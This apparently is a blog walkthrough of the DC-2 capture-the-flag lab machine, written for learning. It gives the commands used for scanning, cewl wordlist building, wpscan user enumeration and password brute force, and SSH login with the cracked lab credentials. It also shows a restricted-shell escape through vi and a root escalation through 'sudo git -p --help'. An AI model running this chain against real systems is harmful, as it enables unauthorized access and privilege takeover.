DC-2 ( Walkthrough )

Starting with enumeration in order to get the IP of the machine using “netdiscover” scan.

netdiscover -i vboxnet1

Here I got the IP of the machine that is 192.168.57.106 so now I proceed with the IP to scan the services running on the machine using “nmap” scan.

nmap -v -sT -p- 192.168.57.106

Here I got two ports open that are 80 and 7744. So, I started a deep scan to get the details of the services running on the port with their versions.

nmap -v -A -sT -p- 192.168.57.106

Here on port no. 80 Apache server is up and on port no. 7744 the “ssh” service is running. Here I take a look on web what is running their or if I got any information their.

Browsing the url “ http://192.168.57.106”

Here I got flag link which the first flag, moving to that,

After reading the flag I moved to the terminal to get the words that are present on the website and make a file named pass.txt using “cewl”

cewl http://dc-2 > pass.txt

Now using “wpscan” tool to enumerate the names of WordPress users.

wpscan --url dc-2 -e u

Here I got the user names now with these user I again user “wpscan” tool to get the password to log in to WordPress.

wpscan -U admin,jerry,tom --url dc-2 -P pass.txt

Username: jerry, Password: adipiscing

Username: tom, Password: parturient

Using the above mentioned credentials I tried to log in to ssh service, but here I am not able to get logged in with the user “jerry” then I tried with “tom” nad here I get logged in.

ssh tom@192.168.57.106 -p 7744

After logging in I got two files.

Here I check the commands that we can run with the user “Tom”.

tom@DC-2:~$ ls -la usr/bin

Here user Tom have the permission to use “vi” command to get the bash shell commands using “vi”.

tom@DC-2:~$ vi
> :set shell=/bin/bash
> :shell

After setting the shell as /bin/bash I exported the shell

tom@DC-2:~$ export PATH=/bin:/usr/bin/

Here we get the bash shell, that's cool now I can read the flag3.txt file.

tom@DC-2:~$ cat flag3.txt

Here I switched to user “jerry” as to get another flag.

tom@DC-2:~$ su jerry

Username: jerry, Password: adipiscing

I used to check the root user command if I can run with a normal user.

jerry@DC-2:/home/tom$ sudo -l

Got that, the user can run the “git” command as root user.

Before proceeding I check if any flag is available their or not. And I got the flag4.txt named file.

cat flag4.txt 

As the flag says I have to use “git” command here to proceed forward after minimizing the terminal.

jerry@DC-2:~$ sudo git -p --help
> !/bin/bash

Well here I got the shell.

root@DC-2:/home/jerry# id
root@DC-2:/home/jerry# cd | ls
root@DC-2:~# cat final-flag.txt

Here we go, good to see the final flag of the machine. Enjoyed the CTF and came to know about interesting tools.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store